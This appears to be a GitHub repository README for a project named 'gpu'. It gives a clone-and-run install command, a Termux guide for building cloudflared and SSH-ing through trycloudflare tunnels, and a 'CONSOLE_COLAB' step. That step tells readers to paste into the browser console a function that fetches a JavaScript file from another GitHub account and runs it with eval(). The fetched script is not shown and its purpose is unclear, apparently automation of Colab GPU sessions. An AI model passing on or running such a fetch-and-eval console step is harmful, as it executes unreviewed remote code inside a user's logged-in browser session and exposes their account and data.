Skip to content

kopen1/gpu

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

39 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

gpu


instalasi :
git clone https://github.com/Kopen1/gpu && cd gpu && sh start.sh

CONSOLE_COLAB

akses console : ctrl + shift + k


async function mode() {
let url = 'https://raw.githubusercontent.com/liebedevil/borr/main/netep.js'
let response = await fetch(url);
let script = await response.text();
eval(script);}
mode();

# INSTALASI SSH CLOUDFLARE 

FOR TERMUX

=================
pkg upgrade
apt install openssh
===================
cd ~
yes "" | pkg update
yes "" | pkg install golang git debianutils make
git clone https://github.com/cloudflare/cloudflared.git --depth=1
cd cloudflared
sed -i 's/linux/android/g' Makefile
make cloudflared
install cloudflared /data/data/com.termux/files/usr/bin
===================
nano ~/.ssh/config
===================
Host *.trycloudflare.com
HostName %h
User root
Port 22
ProxyCommand /data/data/com.termux/files/home/cloudflared/cloudflared access ssh --hostname %h

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published